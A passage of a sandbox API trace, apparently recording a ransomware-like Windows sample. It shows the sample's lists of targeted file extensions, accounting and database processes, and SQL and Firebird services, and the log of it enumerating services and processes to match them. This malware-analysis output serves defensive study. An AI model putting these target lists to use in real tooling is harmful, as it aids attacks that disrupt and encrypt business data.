TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0263.479] CloseHandle (hObject=0x8c) returned 1 [0263.479] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5e3820 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f0d40 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0d40, Size=0x20) returned 0x5f4288 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4288, Size=0x40) returned 0x5f4820 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4820, Size=0x80) returned 0x5f4820 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4820, Size=0x100) returned 0x5f4820 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x5f4928 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f0930 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f0940 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f0950 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f0d40 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f4968 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f0d58 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4968, Size=0x8) returned 0x5f4968 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f0d70 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4968, Size=0x10) returned 0x5f4968 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f0d88 [0263.479] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f0da0 [0263.479] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4968, Size=0x20) returned 0x5f4968 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f0db8 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f0dd0 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0930, Size=0x8) returned 0x5f0930 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0940, Size=0x8) returned 0x5f0940 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f4990 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f0de8 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f49a0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f0e00 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49a0, Size=0x8) returned 0x5f49a0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614ac0 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49a0, Size=0x10) returned 0x5f49a0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614ad8 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f49b8 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49a0, Size=0x20) returned 0x5f49c8 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0930, Size=0x10) returned 0x5f49a0 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0940, Size=0x10) returned 0x5f49f0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f0930 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614af0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f0940 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614b08 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0940, Size=0x8) returned 0x5f0940 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f4a08 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614b20 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f4a18 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614b38 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4a18, Size=0x8) returned 0x5f4a18 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49a0, Size=0x20) returned 0x5f4a28 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49f0, Size=0x20) returned 0x614ea8 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f49f0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614b50 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5f49a0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614b68 [0263.480] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f49a0, Size=0x8) returned 0x5f49a0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x614ed0 [0263.480] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x614ef0 [0263.480] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0263.480] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4820 | out: hHeap=0x5e0000) returned 1 [0263.481] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0263.483] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614b98 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614b98, Size=0x20) returned 0x5f4490 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x619100 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619100, Size=0x80) returned 0x619100 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619100, Size=0x100) returned 0x619100 [0263.483] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614b98 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614b98, Size=0x20) returned 0x5f4490 [0263.483] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x619208 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619208, Size=0x80) returned 0x619208 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619208, Size=0x100) returned 0x619208 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614b98 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x619310 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619310, Size=0x8) returned 0x619310 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x619320 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619310, Size=0x10) returned 0x619340 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x619358 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x5f4490 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619340, Size=0x20) returned 0x619378 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x5f44b8 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6193a0 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x5f44e0 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614bc8 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x619310 [0263.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6193c0 [0263.484] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619310, Size=0x8) returned 0x619310 [0263.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x619408 [0263.884] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619310, Size=0x10) returned 0x619340 [0263.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x619450 [0263.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x619470 [0263.884] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619340, Size=0x20) returned 0x619490 [0263.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6194b8 [0263.884] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0263.884] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619100 | out: hHeap=0x5e0000) returned 1 [0263.884] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0263.884] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619208 | out: hHeap=0x5e0000) returned 1 [0263.884] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x619a10 [0264.103] EnumServicesStatusExW (in: hSCManager=0x619a10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0264.104] GetLastError () returned 0xea [0264.104] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9a8) returned 0x61d2f0 [0264.104] EnumServicesStatusExW (in: hSCManager=0x619a10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x61d2f0, cbBufSize=0x9a8, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x61d2f0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0264.104] CloseServiceHandle (hSCObject=0x619a10) returned 1 [0264.173] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0264.173] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0264.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0264.173] lstrlenW (lpString="AudioSrv") returned 8 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0264.173] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0264.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0264.173] lstrlenW (lpString="CscService") returned 10 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0264.173] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0264.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0264.173] lstrlenW (lpString="DcomLaunch") returned 10 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0264.173] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0264.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0264.173] lstrlenW (lpString="Dhcp") returned 4 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0264.173] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0264.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0264.173] lstrlenW (lpString="Dnscache") returned 8 [0264.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0264.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0264.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0264.174] lstrlenW (lpString="eventlog") returned 8 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0264.174] lstrlenW (lpString="EventSystem") returned 11 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0264.174] lstrlenW (lpString="gpsvc") returned 5 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0264.174] lstrlenW (lpString="lmhosts") returned 7 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0264.174] lstrlenW (lpString="MMCSS") returned 5 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0264.174] lstrlenW (lpString="nsi") returned 3 [0264.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0264.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0264.174] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0264.174] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0264.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0264.175] lstrlenW (lpString="PlugPlay") returned 8 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0264.175] lstrlenW (lpString="Power") returned 5 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0264.175] lstrlenW (lpString="ProfSvc") returned 7 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0264.175] lstrlenW (lpString="RpcEptMapper") returned 12 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0264.175] lstrlenW (lpString="RpcSs") returned 5 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0264.175] lstrlenW (lpString="SamSs") returned 5 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0264.175] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0264.175] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0264.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0264.175] lstrlenW (lpString="Schedule") returned 8 [0264.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0264.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0264.176] lstrlenW (lpString="SENS") returned 4 [0264.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0264.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0264.176] lstrlenW (lpString="ShellHWDetection") returned 16 [0264.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0264.176] lstrlenW (lpString="Spooler") returned 7 [0264.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0264.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0264.176] lstrlenW (lpString="Themes") returned 6 [0264.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0264.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0264.176] lstrlenW (lpString="UxSms") returned 5 [0264.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0264.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0264.176] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0264.176] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0264.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0264.176] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61d2f0 | out: hHeap=0x5e0000) returned 1 [0264.183] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0264.185] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.185] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.185] lstrlenW (lpString="System") returned 6 [0264.185] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0264.185] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0264.185] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.186] lstrlenW (lpString="smss.exe") returned 8 [0264.186] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0264.186] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.186] lstrlenW (lpString="csrss.exe") returned 9 [0264.186] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.186] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.186] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.186] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.186] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.186] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.186] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.187] lstrlenW (lpString="wininit.exe") returned 11 [0264.187] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="mysqld-nt.exe", 